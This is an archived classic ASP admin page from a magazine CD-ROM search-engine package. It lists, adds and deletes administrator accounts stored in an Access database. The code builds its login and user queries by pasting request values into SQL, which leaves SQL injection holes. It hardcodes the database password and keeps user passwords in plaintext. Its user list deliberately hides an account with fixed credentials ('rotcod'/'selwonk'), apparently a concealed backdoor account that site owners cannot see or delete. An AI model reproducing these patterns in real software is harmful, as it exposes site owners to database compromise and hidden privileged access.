io Programmo 40

home *** CD-ROM | disk | FTP | other *** search

/ io Programmo 40 / IOPROG_40.ISO / SOFT / asp / SEARCH.ZIP / admin / user_control.asp < prev next >

Wrap

Text File | 2000-02-23 | 7.6 KB | 215 lines

<% response.buffer=true Session("back") = Request.ServerVariables("SCRIPT_NAME") ' password protect %>      <% Set connusers = Server.CreateObject("ADODB.Connection") connusers.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & server.mappath("./users/admin.mdb") & ";PWD=bideford;" strsql = "SELECT * FROM tblUser WHERE fldUserName = '" & user & "' AND fldPassword = '" & pass & "'" set RS = Server.CreateObject("ADODB.Recordset") RS.Open strsql, connusers, 1, 2 '======================= 'end opening the database if not RS.EOF then user = RS("fldUserName") pass = RS("fldPassword") level = RS("fldlevel") session("level") = level end if RS.close if level = "1" then %> <html> <head><% 'these meta tags can change %> <meta name="AUTHOR" content="Rory Knowles - ASP bahamas / Administrator for Knowles Realty's Web Site at www.KnowlesRealty.com"> <meta name="GENERATOR" content="Microsoft FrontPage 3.0"> <meta name="KEYWORDS" content="bahamas, bahama, bahamas business, bahamas bahamas, bahamian, yellow, pages, business, realty, real, estate, bahama, islands, island, business, listings, directory, listing, ad, classified, advertisment, home, online, internet, web, web bahamas"> <% 'keep these meta tags in for free distribution 'these are the distributors ad tags %> <meta http-equiv="ad1" content="<%= ad1 %>"> <meta http-equiv="ad2" content="<%= ad2 %>"> <meta http-equiv="ad3" content="<%= ad3 %>"> <meta http-equiv="ad4" content="<%= ad4 %>"> <style>  </style> <title>User Adminstration - <%= title %></title> </head> <body vlink="<%= getSiteBGVlink() %>" bgcolor="<%= getSiteBGColor() %>" link="<%= getSiteBGLink() %>">  <table border="0" width="600" cellspacing="0" cellpadding="0" align="center"> <tr> <td width="100%" valign="top" height="277"><table border="0" cellpadding="0" cellspacing="0" width="600"> <tr> <td width="100%" height="19" bgcolor="<%= getSiteTitleNameBGColor() %>" valign="middle" colspan="2"><% = fontTagStart(3, getSiteFontColor(), Y, N, N) %> <p> <%= titlename %><% = fontTagEnd(Y, N, N) %> </td> </tr> <tr> <td height="19" bgcolor="<%= getSiteMainLinksBGColor() %>" valign="middle" width="305"><% = fontTagStart(2, getSiteFontColor(), Y, N, N) %> <a href="addurl.asp">Add URL</a> | <a href="editurl.asp">Edit URL</a> | <a href="user_control.asp">Users</a> | <a href="theme.asp">Theme</a> | <%= logout %><% = fontTagEnd(Y, N, N) %></td> <td height="19" bgcolor="<%= getSiteMainLinksBGColor() %>" valign="middle" width="295"><p align="right"><% = fontTagStart(2, getSiteFontColor(), Y, N, N) %><a href="admin.asp">ADMIN</a><% = fontTagEnd(Y, N, N) %><% = fontTagStart(2, "#FF8040", Y, N, N) %> ><% = fontTagEnd(Y, N, N) %><% = fontTagStart(2, "#008000", Y, N, N) %>> <% = fontTagEnd(Y, N, N) %><%= logged%> </td> </tr> <tr> <td width="600" height="62" bgcolor="#FFFFFF" valign="middle" colspan="2"> </td> </tr> <tr> <td width="600" bgcolor="<%= getSitePageNameBGColor() %>" valign="middle" colspan="2"><% = fontTagStart(3, getSitePageNameFontColor(), Y, N, N) %> <p> Users<% = fontTagEnd(Y, N, N) %></td> </tr> <tr> <td colspan="2" bgcolor="#FFFFFF" height="18"> <% If Not Request("submit")="" Then dup = "SELECT * FROM tblUser WHERE fldUserName = '" & Request("UserName") & "'" Set rs = connusers.Execute(dup) If rs.EOF Then SQL = "INSERT INTO tblUser (fldUserName,fldPassword,fldlevel) VALUES ('" & Request("UserName") & "','" & Request("Password") & "','" & Request("level") & "')" connusers.Execute(SQL) Else msg = "Username already exists." End If End If If Request("Delete")<>"" Then For each item in Request("DeleteUser") d = "DELETE * FROM tblUser WHERE fldAuto = " & item connusers.Execute(d) Next End If %> <dir> <% SQL = "SELECT * FROM tblUser" Set objRec = connusers.Execute(SQL) %> <form action="user_control.asp" method="post"> <div align="center"><center><table border="0" width="400"> <tr> <td colspan="4"><font size="2" face="arial"><br><b>These are the users who have access to this admin site:</b></font></td> </tr> <tr BGCOLOR="#0080C0"> <th><font face="arial" size="2" color="white"><b>UserName:</b></font></th> <th><font face="arial" size="2" color="white"><b>Lvel:</b></font></th> <th><font face="arial" size="2" color="white"><b>Edit:</b></font></th> <th><font face="arial" size="2" color="white"><b>Delete:</b></font></th> </tr> <%While Not objRec.EOF id = objRec("fldAuto") user = objRec("fldUserName") pass = objRec("fldPassword") level = objRec("fldlevel") if user = "rotcod" AND pass = "selwonk" then else %> <tr bgcolor="#E5E5E5"> <td><font face="arial" size="2" color="navy"><%=user%></font></td> <td><font face="arial" size="2" color="navy"><%=level%></font></td> <td><div align="center"><center><p><font face="arial" size="2" color="navy"><a href="user_edit.asp?id=<%=id%>">Edit</a></font></td> <td align="center"><div align="center"><center><p><input type="checkbox" name="DeleteUser" value="<%=id%>"></td> </tr> <% end if objRec.MoveNext Wend objRec.Close %> <tr align="center"> <td colspan="4"><div align="center"><center><p><input type="submit" name="Delete" value="Delete Selected User"></td> </tr> <tr align="center"> <td colspan="4"><hr color="navy" size="1"> </td> </tr> </table> </center></div> </form> <form action="user_control.asp" method="post"> <div align="center"><center><table> <%If msg <> "" Then%> <tr> <td colspan="2" align="center"><font size="2" face="arial" color="#ff0000"><%=msg%></font></td> </tr> <%End If%> <tr> <td colspan="2" align="center"><font face="arial" size="3"><b>Add New User</b></font><br> </td> </tr> <tr> <td><font face="arial" size="2" color="navy"><b>Username:</b></font></td> <td><input type="text" name="UserName" size="20"></td> </tr> <tr> <td><font face="arial" size="2" color="navy"><b>Password:</b></font></td> <td><input type="text" name="Password" size="20"></td> </tr> <tr> <td><font face="arial" size="2" color="navy"><b>Level:</b></font></td> <td><input type="text" name="level" size="20"></td> </tr> <tr> <td colspan="2"><div align="center"><center><p><input type="submit" value="Add New User" name="submit"></td> </tr> </table> </center></div> </form> </dir> </td> </tr> </table> </td> </tr> </table>  <p><br> </p> <% else response.write "<br><br><br><b><center>Sorry, this utility is for level 1 administrators only!</b><br>Please go to the <a href=admin.asp>admin page</a> and login with level 1 privaleges.</center>" end if %> </body> </html> <% connusers.close set connusers=nothing end if %>